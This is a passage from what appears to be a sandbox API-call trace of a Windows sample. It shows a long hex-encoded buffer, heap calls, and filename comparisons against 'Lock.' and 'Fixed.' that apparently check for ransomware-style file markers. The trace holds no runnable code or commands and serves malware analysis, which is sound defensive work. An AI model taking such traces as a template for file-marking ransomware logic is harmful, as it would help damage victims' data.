d\x4f4e\x59c8\x91ab\x2538\x3edc\x167e\x3389\xdf7c\x54a6\xbb2e\xe51f\xa886\x417\xe2c1\x78f8\x3586\xd200\x13e9\x8fb8\xa75c\x1c99\x818\xc962\xe393\xc990\x2ca2\x69e7\xedd4\x92ac\x5f71\xdfc7\x7623\x1f06\x79e1\x7da9\xf3d\xdd79\x9d59\x70a6\x1187\xfc35\x98ee\x57f0\x8475\xb8a6\xf3d8\xe2ad\x217e\xc700\xb7f6\x7b63\x3d44\xf277\x5644\x93af\xd1aa\xb262\x7e36\xb37c\xa593\x6673\xfbf6\xbe6a\xc257\x7e06\x9a6f\xda5e\xc9e9\x29b7\x8715\x7f71\x320\xce65\xb947\xb241\xdb2d\xf2e4\x237f\xb6a7\xa2b5\xcd7d\x5ba1\x306c\x2b0d\x6dd0\x5d05\xd056\x573\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x9d45\xb7eb\x4236\x3154\x7544\x59e2\x2049\x8db7\xbbd\x3422\xcf0f\xb93f\x1e82\x7810\x1054\xefe3\x1195\xbba3\xe051\xe34e\x78ed\x5aac\x96ac\x23c4\x9d4b\x9f66\xbf40\x9448\xb3df\x861b\xcc74\x78e7\x1135\x5def\x69a7\x5aed\xf38b\x5166\xed2a\x6e32\xbc96\x45e5\xa52d\xad12\xef61\xa0e0\xf142\xbeb3\x8980\xf9a3\xd036\xef77\x2590\xef9a\xda08\xdca7\x9381\x2064\x83d2\x3228\xa315\x820f\x505e\x8af5\xe269\x637a\xb29c\x4caf\xd583\xd948\x9de8\xb292\xd40\x9056\x200d\x987e\xc2db\xd09f\x883\x3f2f\xdc85\xe569\x9005\x9d64\x7077\x84fa\xaaa\xef39\x9e49\x63e0\x4ef4\x372f\x3311\xe57\x4524\xeb2d\x62a\x723\x14c2\x4f85\x8a41\xf086\xb047\xaf02\x2f1f\xb04b\x77be\xb52a\xd9b2\xbd88\x5d4b\x3105\x77a2\x3e33\xdec3\xbb0d\x3c7f\xdd76\xcd0a\x247f\xe20c\xa644\x6dd1\x2e06\x2181\x7b19\x263d\x48fc\x3ee7\x191a\x9690\xfa7d\x546d\x8f2\xb3db\xa261\x554d\x5cb8\x1dc4\xc202\xd873\xc5b3\x569a\x9117\xee7f\xbb73\xfce2\x2130\xfdad\xd9d7\xfe11\xddc6\xdfdd\x4767\xa24e\x8882\x12d3\xc548\x6eca\x653e\x1d9a\xb5e\xcc4e\x23a8\x3130\x4bf4\xab75\xe4d8\x9edb\xa39b\xa054\x9b2b\xfd6a\xc40a\x2cdf\x7e3\xc97b\xd0d1\xe923\x5816\x3d7b\xca0d\x9c5a\x6554\x8b63\x5699\x8afc\x9160\x5936\x4658\x685d\x2d15\x448d\x38a\x53da\x71d2\x4eb\x9787\x7fbd\xf01d\xe5a1\xedc0\x85ff\xe4f3\x85cd\x5591\xfed6\x6229\xbd54\x2f24\x7747\xa25f\xe6e7\x94e5\x7ac8\xf2b6\xc3e6\x7032\x8b54\xd3d7\x74b0\xee18\x900e\x7e50\x13a\x3db9\x5bb3\xa50d\x58dc\xb0e6\xadf9\xfe0d\x96cc\x77c0\x6fc8\x72f2\x4c6\x6980\xfe5\x74d9\xdd06\x1c5e\x288e\x4e90\x95b1\xbc77\x2b02\x4829\x1d76\xdd36\x7465\x82a4\xddde\xdba4\xad09\x8f0f\x3180\xdd5a\xa304\x183c\xc1ef\x17c2\x64c0\x1dfb\x92f8\x2f08\x135a\x12e2\x2947\x706f\x23b9\xd6c\x3a96\x6848\x8a79\xb1b2\x2f9e\xb054\x754a\x7560\x63b9\xb8bf\x964d\xca94\xa33f\x383f\x78c8\x9edf\xeddd\xaf4f\xac05\xb77d\xf800\x53ae\x5d0b\x7288\xbde4\xe730\xe36f\x8015\xdafe\x6d4f\xd605\x3f66\xa3dd\x5ce6\xe7ad\xbef1\x8f5f\xc6fd\xc4c5\xa9eb\xea59\x85f6\x650a\xa055\xe967\x7520\x825d\xdacf\x3aa0\x43bc\x31d2\xcf81\x107a\x2cd2\x8f69\x410e\xdf8d\x75a8\x5814\xf84f\xbf33\xbc0a\x306\xcd8d\xff2e\x778a\xb47f\x95f1\x1f4d\x7c6a\xaa95\x9aa7\x12d\xf9e8\xdc58\xc29e\x8f9e\x1bd5\xcf45\x16c7\x8a35\x8f9e\xd69d\xab88\xe1c0\x3cc8\x5f41\xa652\xc684\xdc8d\x562c\xaf67\x8dd2\x9b07\x7e43\x3f8b\x60f3\x2be0\xa444\xbba7\x6771\x9c57\x2e1\x5d66\xdb4\xb599\x39d8\xcf85\x1222\x35dd\xce15\xe7b6\xab8\x21d\xbb3d\xe97d\x8e0a\xa07b\x1068\x77c5\x812\xf5e8\xf95b\xa709\x8b80\xfead\x34d2\x56c5\x745\x71be\xcab3\x4d57\xecc8\xab52\x9120\x1b46\xdb70\xfed3\x4c72\xbed4\xd73c\x1ee\x800e\x4fae\xeccd\x6fc1\xd4f0\x9e81\xfe1a\x5b2b\x1c77\xb09\x2c37\xead8\x2bd8\x4262\x367f\x5205\x5fb1\x22c6\xbaa3\xbc59\xd22f\xeff9\xfaaf\x941a\x59e1\x3c56\xd529\x3514\x54bd\x12f5\x73f2\x4173\x9e7\xe1ad\x21f2\xf8c8\xd928\x8d1f\x4186\xb7ac\xdc01\xa7ea\xf1e8\x54aa\xc4dc\x166d\xa3aa\x8b00\xd151\x6248\xdb74\xa903\xd05a\x80ef\xf415\x8efb\x112c\xb25\x6265\xaf04\xafe7\xf2af\xebe5\x5c5f\x7e0e\x6c8\xf082\xb8d7\x96ab\x6bc5\x8437\xbde0\xa9cd\x3505\x374b\x3f29\xd585\xf8ae\x3cbc\x31f7\xaa49\x5ba1\x5050\x280e\x60d\xd3e\x9a14\x825f\xf2af\xf5dc\x8c00\x9746\xf463\x1e3a\x38fd\xa746\x6888\x32dc\x2f0e\xcf29\x75fd\x5c5c\xc625\x53dd\x1b9e\x8b8a\x3143\x7c39\x7953\xafee\xe2e2\x62d6\xf5dc\xb9e5\xc44f\x61c5\xe10d\xca4b\xff73\xe96d\xb89\x5c61\xf2ff\x37dc\x2e30\xc449\x863d\xc02b\x37af\x4f44\xa8dc\x6b66\xf790\x9c22\x8384\x204\xc41c\x2090\x931f\xb68e\x233\xcf2d\x1923\xa356\x8403\x31a7\x4890\x3b1b\x3cdc\xe819\x3804\xa303\x2165\xf40b\x26e0\xe7f5\xf6a0\x676b\xb68f\xca23\x214d\xb422\x844a\x8b66\xb150\x2d08\xa114\x447b\x58a8\x6684\xd088\x1132\xc89a\xb443\xa22c\xdb54\x58d9\xf111\xb8a2\xe2cd\x77ba\x5a39\xfc40\x8830\x9adf\x162a\xf9fc\x729f\x8549\x490a\x4505\xc811\x217a\xa42e\x2083\x37cf\x71d9\x4a02\xfb02\x11cf\x1d5c\x985b\xbfeb\x2c40\xd91c\x112f\xb7d9\x9c70\x3d03\x132b\x128d\x1eb9\x69ac\x177c\x7e30\x87d\xf294\x783\x80f\xeb76\x8d7d\x411b\xc0fd\xab14\x2573\xbd69\x6128\x973f\x9a2d\xd559\xa111\x4554\x2289\x17a6\xd4d1\xaea7\x2585\xa4f0\x8fa9\x8140\x2fa7\xf7b\xa76a\x65a9\xcad7\xe0fc\x5ed6\xc9f6\x457f\x4f09\xf0b\xd8b4\xcbe\x2c1b\xcf45\xe0e1\xaabe\x593\xa21a\x30d7\x9a42\x1b1e\x9987\xc1f6\x30f3\xa916\x4257\xb489\x2d9b\xc5e5\x5cf1\x6093\xe075\x7aa7\xd258\x68e1\x3ea4\xa686\x78da\xaddd\xa16c\x39a8\x9c72\x4ae7\xe4ae\x3cd4\x648f\xc531\x661\xe1ad\xf644\x8fcf\x300\xe30e\x95d2\x3bf1\xace9\x957b\x9e76\x5feb\xb219\x5e3f\xfdc7\x7175\x8cce\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae")) returned 0 [0253.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0253.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0253.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0253.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0253.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0253.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0253.900] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0253.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0253.900] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0253.900] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0253.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0253.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0253.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0253.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0253.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0253.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0253.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0253.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0253.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0253.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0253.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0253.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0253.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0253.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xBQp6dTr52cBE6l-Un.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0253.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BQp6dTr52cBE6l-Un.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0253.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qp6dTr52cBE6l-Un.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0253.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p6dTr52cBE6l-Un.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0253.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6dTr52cBE6l-Un.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0253.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dTr52cBE6l-Un.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0253.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Tr52cBE6l-Un.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0253.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r52cBE6l-Un.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0253.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="52cBE6l-Un.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0253.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2cBE6l-Un.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0253.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cBE6l-Un.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0253.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BE6l-Un.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0253.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E6l-Un.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0253.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6l-Un.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0253.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l-Un.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0253.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-Un.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0253.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Un.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0253.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0253.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0253.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0253.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0253.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0253.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0253.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0253.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0253.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0253.903] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0253.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0253.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0253.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0253.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0253.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0253.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0253.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0253.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0253.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0253.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0253.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0253.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0253.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0253.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0253.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0253.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0253.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0253.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0253.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x2e) returned 0x24b3500 [0253.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0253.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xBQp6dTr52cBE6l-Un.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0253.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BQp6dTr52cBE6l-Un.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0253.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qp6dTr52cBE6l-Un.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0253.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p6dTr52cBE6l-Un.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0253.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6dTr52cBE6l-Un.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0253.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dTr52cBE6l-Un.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0253.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Tr52cBE6l-Un.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0253.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r52cBE6l-Un.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0253.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="52cBE6l-Un.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0253.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2cBE6l-Un.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0253.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cBE6l-Un.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0253.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BE6l-Un.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0253.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E6l-Un.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0253.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6l-Un.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0253.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l-Un.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0253.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-Un.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0253.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Un.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0253.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0253.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b34c8 [0253.906] RtlAllocateHeap 